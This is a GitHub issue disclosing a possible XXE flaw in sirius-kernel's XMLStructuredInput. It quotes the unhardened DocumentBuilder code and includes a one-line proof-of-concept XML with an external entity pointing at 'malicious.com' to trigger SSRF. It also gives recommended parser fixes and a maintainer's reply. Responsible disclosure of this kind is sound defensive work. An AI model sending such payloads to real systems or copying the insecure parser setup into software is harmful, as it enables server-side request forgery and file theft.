We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hi team, there might be a potential XXE vulnerability but I'm not sure whether it's a actual risk or not, just creating a issue here for you to check On https://github.com/scireum/sirius-kernel/blob/develop/src/main/java/sirius/kernel/xml/XMLStructuredInput.java#L38 function XMLStructuredInput()
A external XML is parsed with DocumentBuilder without security settings enabled:
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); if (namespaceContext != null) { factory.setNamespaceAware(true); } DocumentBuilder builder = factory.newDocumentBuilder(); Document document = builder.parse(inputStream);
An malicious XML as input could be used to exploit the vulnerability. For example they could craft a poc.xml like this:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "https://malicious.com/exploit">]> <root>&xxe;</root>
to trigger a SSRF
Attackers can also exploit this vulnerability to access sensitive files on the system, overload the system with malicious XML payloads and so on.
Fix recommendation would be using the following functions to disable DTD or external entities: factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true); Or factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://xml.org/sax/features/external-general-entities", false); factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
The text was updated successfully, but these errors were encountered:
Hi @JAckLosingHeart - thanks for your report. We checked it and also checked other possible vulnerable implementations.
Fix is available in #543 and also scireum/sirius-web#1488 If you have any comments or see ongoing issues, feel free to contact us again.
Sorry, something went wrong.
No branches or pull requests
Hi team, there might be a potential XXE vulnerability but I'm not sure whether it's a actual risk or not, just creating a issue here for you to check
On https://github.com/scireum/sirius-kernel/blob/develop/src/main/java/sirius/kernel/xml/XMLStructuredInput.java#L38
function XMLStructuredInput()
A external XML is parsed with DocumentBuilder without security settings enabled:
An malicious XML as input could be used to exploit the vulnerability. For example they could craft a poc.xml like this:
to trigger a SSRF
Attackers can also exploit this vulnerability to access sensitive files on the system, overload the system with malicious XML payloads and so on.
Fix recommendation would be using the following functions to disable DTD or external entities:
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
The text was updated successfully, but these errors were encountered: